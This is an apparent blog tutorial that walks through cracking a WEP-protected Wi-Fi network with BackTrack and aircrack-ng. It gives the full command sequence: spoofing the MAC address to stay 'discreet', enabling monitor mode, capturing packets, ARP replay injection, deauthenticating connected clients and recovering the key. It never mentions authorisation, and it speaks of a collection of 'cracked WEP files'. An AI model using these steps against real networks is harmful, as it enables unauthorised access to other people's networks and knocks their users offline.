The first thing we are going to do is install BackTrack 3 or 4 onto an SD card or flash drive or cd/dvd rom so we can boot from it without having to mess up the currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet.

After you have booted into BackTrack, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:

ifconfig wlan0 (yours may be different i.e. ath0 or rausb0) down

Next we want to change the MAC address of your wireless card to make things easier later and help you be more discreet:

macchanger --mac 00:11:22:33:44:55 wlan0

Next we want to bring it back up, but in monitor mode (this enables the card to capture packets without associating with the AccessPoint) :

airmon-ng start wlan0

You should see that a new interface called mon0 was created. That is the interface we are going to use for the rest of our cracking. Next:

airodump-ng mon0

This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write them down, just open a new shell and leave that one open.

Now press

ctrl+c

to stop airodump-ng.

Open a new console (if you haven’t already) and type:

airodump-ng --channel x --bssid y -w filename mon0

Where x and y are the channel and bssid that you wrote down, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I’m searching through my cracked WEP files I know whats what.

Now leave that running and open another shell and type:

aireplay-ng --arpreplay -b [Access Point's MAC] -h 00:11:22:33:44:55 mon0

Now leave that running and open yet another shell, and type:

aireplay-ng --deauth 5 -c 00:11:22:33:44:55 -a [Access Point's MAC] mon0

Now in that same window type:

aircrack-ng filename*.cap

Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arise.